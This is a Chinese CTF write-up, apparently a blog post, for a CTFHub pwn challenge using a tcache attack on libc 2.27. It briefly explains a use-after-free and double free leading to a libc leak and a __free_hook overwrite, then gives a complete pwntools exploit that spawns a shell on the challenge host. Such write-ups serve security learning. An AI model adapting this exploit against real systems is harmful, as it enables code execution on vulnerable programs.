[CTFHub]-技能树----pwn tcache Attack

目前只有我一人解出来,估计是其他大佬不屑于做这样简单的题吧!
长话短说,做堆类题一定要亲自动手调试!!!调试!!!调试!!!,重要的事情说三遍。

难度

入门级别,很简单

解析

题目给了libc版本,是libc_2.27。
首先先创建7个0x80的chunk,然后把他们free掉,使他们进入tcache bins,然后再创建一个0x80大小的chunk释放掉,使其进入unsorted bins,因为本题free掉chunk后并没有置0,所以纯在UAF和double free。然后可以通过show函数泄露unsorted bins中的地址计算libc基地址,在通过double free漏洞改__free_hooke的值为system的值,最后拿到shell。

标题最终exp

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk1"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",28689)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27_64.so")

def add(idx,size,data):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"1")
	io.recvuntil(b"Give me a book ID: ")
	io.sendline(str(idx))
	io.recvuntil(b"how long: ")
	io.sendline(str(size))
	io.recvuntil(b"Content: ")
	io.send(data)

def show(idx):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"2")
	io.recvuntil(b"Which book do you want to show?")
	io.sendline(str(idx))
	

def free(idx):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"3")
	io.recvuntil(b"Which one to throw?")
	io.sendline(str(idx))

for i in range(7):
	add(i,0x80,b"aaaa")

add(7,0x80,b"aaaa")
add(8,0x90,b"/bin/sh\x00")
for i in range(8):
	free(i)

show(7)
io.recvuntil(b"Content: ")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_addr+libc.sym['__free_hook']
system_addr = libc_addr+libc.sym['system']
print(b"libc_addr-------------->: ",hex(libc_addr))
print(b"free_hook-------------->:",hex(free_hook))
for i in range(6):
	add(6-i,0x80,b"aaaa")

free(0)
add(0,0x80,p64(free_hook))
add(9,0x80,b"aaaa")
add(10,0x80,p64(system_addr))
free(8)


io.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值